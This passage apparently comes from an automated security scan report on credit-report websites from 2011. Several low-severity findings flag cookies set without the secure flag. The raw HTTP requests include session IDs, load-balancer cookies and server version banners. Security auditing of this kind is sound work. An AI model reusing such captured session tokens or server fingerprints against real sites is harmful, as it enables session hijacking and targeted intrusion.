Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000; mbox=check#true#1303691746|session#1303691685768-21127#1303693546|PC#1303691685768-21127.17#1304901288; s_pers=%20s_lv%3D1303691693010%7C1398299693010%3B%20s_lv_s%3DFirst%2520Visit%7C1303693493010%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691693040'%255D%255D%7C1461544493040%3B%20sc_cidstack%3D%255B%255B'669023_EYypxrx2'%252C'1303691693047'%255D%255D%7C1461544493047%3B%20sc_dl%3D1%7C1303693786444%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditchecktotal.com%252Fdefault.aspx%253Fsc%253D669023%2526bcd%253DEYypxrx2%2526mkwid%253DsEYypxrx2%2526pcrid%253D7154421312%2526kwid%253Dcredit%252520monitoring%7C1303693786452%3B%20gpv_PN%3D100244%253Adefault.aspx%7C1303693786456%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20ttc%3D1303691986229%3B%20sc_gvl_sc%3D669023%3B%20sc_gvl_bcd%3Deyypxrx2%3B%20c_m%3Dundefined669023_EYypxrx2undefined%3B%20SC_LINKS%3D100244%253Adefault.aspx%255E%255E%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E100244%253Adefault.aspx%2520%257C%2520%252FCobrand%252FImages%252FCreditMatter%252FGetYoursNow_btn.gif%255E%255E%3B%20s_sq%3Dexpiglobal%252Cexpicctlive%253D%252526pid%25253D100244%2525253Adefault.aspx%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditchecktotal.com%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DX2THZ%25252526SiteVersionID%2525253D752%25252526SiteID%2525253D100244_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; OriginalReferrer=creditchecktotal.com; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 5:39:40 PM

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default+s_code.axd+Order1+s_code.axd; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:39:44 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:39:44 GMT
ETag: "pv29199a014faff4ac2e548e604da819d8"
Expires: Wed, 27 Apr 2011 00:39:44 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C64259.A70594.RA70541.G11457.UD84854FD].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65887

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expiglobal,expicctlive"

var s=s_gi(s
...[SNIP]...

11.91. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpAddressByZipQAS,ECD.Web.WebProcess.AccountInfo.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /DNI/ajaxpro/ECD.Web.WebProcesses.bpAddressByZipQAS,ECD.Web.WebProcess.AccountInfo.ashx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /DNI/ajaxpro/ECD.Web.WebProcesses.bpAddressByZipQAS,ECD.Web.WebProcess.AccountInfo.ashx HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NavFlowID=; NumTrialDaysLeft=; OriginalReferrer=creditreport.com/dni; MachineName=IRC-P2WEB-34; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 5:38:38 PM; UID=1fa600332c0648788a77895b94007015; ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+s_code.axd+Order1+ECD.Web.WebProcesses.bpAddressByZipQAS,ECD.Web.WebProcess.AccountInfo.ashx; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 5:38:41 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:38:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:38:41 GMT
ETag: "pv3dceff9a200494014dd76e454126c9f8"
Expires: Wed, 27 Apr 2011 00:38:41 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C94085.A70594.RA70541.G11457.UB5D65B17].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 955

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpAddressB
...[SNIP]...

11.92. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /DNI/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /DNI/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NavFlowID=; NumTrialDaysLeft=; OriginalReferrer=creditreport.com/dni; MachineName=IRC-P2WEB-34; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 5:38:38 PM; UID=1fa600332c0648788a77895b94007015; ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+s_code.axd+Order1+ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 5:38:41 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:38:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:38:41 GMT
ETag: "pve6b631124c6e77b08272636f6750d6c7"
Expires: Wed, 27 Apr 2011 00:38:41 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C94085.A70594.RA70541.G11457.U69C5539F].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 791

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpRegister
...[SNIP]...

11.93. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /DNI/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /DNI/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NavFlowID=; NumTrialDaysLeft=; OriginalReferrer=creditreport.com/dni; MachineName=IRC-P2WEB-34; NavigationPath=default+s_code.axd+Order1; LastVisitDate=4/24/2011 5:38:38 PM; UID=1fa600332c0648788a77895b94007015; ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: NavigationPath=default+s_code.axd+Order1+ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 5:38:41 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Last-Modified: Mon, 25 Apr 2011 00:38:41 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:38:41 GMT
ETag: "pvfcfdf636b56d5cf691cbcb1fc0694739"
Expires: Wed, 27 Apr 2011 00:38:41 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C94085.A70594.RA70541.G11457.U783D5C16].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 867

if(typeof ECD == "undefined") ECD={};
if(typeof ECD.Web == "undefined") ECD.Web={};
if(typeof ECD.Web.WebProcesses == "undefined") ECD.Web.WebProcesses={};
if(typeof ECD.Web.WebProcesses.bpSubmit =
...[SNIP]...

11.94. https://www.creditreport.com/dni/Order1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /dni/Order1.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: MachineName=IRC-P2WEB-34; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: OriginalReferrer=creditreport.com/dni; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=Order1; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 6:28:17 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavFlowID=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NumTrialDaysLeft=; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=77731daa732e49aea233d47cad936667; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:28:17 GMT
ETag: "pvdcf78c1ce3f3db158411db27325dde06"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C94085.A70594.RA0.G11457.UC0B2A2EA].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 31547

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>
           CreditReport.com | Credit Report and Credit Score Online by Expe
...[SNIP]...

11.95. https://www.creditreport.com/dni/javascripts/s_code.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditreport.com
Path:   /dni/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/javascripts/s_code.axd HTTP/1.1
Host: www.creditreport.com
Connection: keep-alive
Referer: https://www.creditreport.com/dni/Order1.aspx?areaid=22&pkgid=C2TDM&SiteVersionID=967&SiteID=100332&sc=671917&bcd=comptst
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hagtik45j1aer4550yifj445; BIGipServercreditreport-web-pool=176573962.39455.0000; mbox-experianuk=check#true#1303691756|session#1303691695624-816974#1303693556; mbox-experian=check#true#1303691756|session#1303691695628-869024#1303693556; mbox-protectmyidcom=check#true#1303691756|session#1303691695631-207802#1303693556; mbox=check#true#1303691756|session#1303691695619-486775#1303693556|PC#1303691695619-486775.17#1304901298; s_pers=%20s_lv%3D1303691698036%7C1398299698036%3B%20s_lv_s%3DFirst%2520Visit%7C1303693498036%3B%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691698058'%255D%255D%7C1461544498058%3B%20sc_cidstack%3D%255B%255B'671917_comptst'%252C'1303691698065'%255D%255D%7C1461544498065%3B%20sc_dl%3D1%7C1303693721567%3B%20gpv_p50%3Dhttp%253A%252F%252Fwww.creditreport.com%252Fdni%252Fdefault.aspx%253FPageTypeID%253DHomePage3%2526SiteVersionID%253D967%2526sc%253D671917%2526bcd%253Dcomptst%2526s_kwcid%253DTC%257C14081%257Cinstant%252520credit%252520report%252520free%257C%257CS%257Cb%257C7587846271%2526gclid%253DCLv8q_e1tqgCFYLc4Aod_H_yBQ%7C1303693721723%3B%20gpv_PN%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%7C1303693721729%3B; s_sess=%20s_cc%3Dtrue%3B%20sc_cp_channel%3D1%3B%20sc_cp_paid%3D1%3B%20sc_gvl_sc%3D671917%3B%20sc_gvl_bcd%3Dcomptst%3B%20c_m%3Dundefined671917_comptstundefined%3B%20ttc%3D1303691921739%3B%20s_tempSCCT%3DTC%257C14081%257Cinstant%2520credit%2520report%2520free%257C%257CS%257Cb%257C7587846271%3B%20SC_LINKS%3D100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%255E%255E%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E100332%253Adni%253Adefault.aspx%253Apagetypeid%253Dhomepage3%2520%257C%2520%252FDNI%252FCobrand%252FImages%252Fhomepage2%252Forderbtn.png%255E%255E%3B%20s_sq%3Dexpimnicrlive%252C%2520expiglobal%253D%252526pid%25253D100332%2525253Adni%2525253Adefault.aspx%2525253Apagetypeid%2525253Dhomepage3%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.creditreport.com%2525252Fdni%2525252FOrder1.aspx%2525253Fareaid%2525253D22%25252526pkgid%2525253DC2TDM%25252526SiteVersionID%2525253D967%25252526SiteID%2525253D100332_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditreport.com/dni; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: MachineName=IRC-P2WEB-34; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: NavigationPath=default+s_code.axd+Order1+s_code.axd; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: LastVisitDate=4/24/2011 5:38:44 PM; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Set-Cookie: UID=bed8726fe4b94ccc89c91d5fe012c5e9; domain=www.creditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/DNI/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:38:44 GMT
ETag: "pvc86e2c59b0f7c48f210aad06b63ccdc7"
Expires: Wed, 27 Apr 2011 00:38:44 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
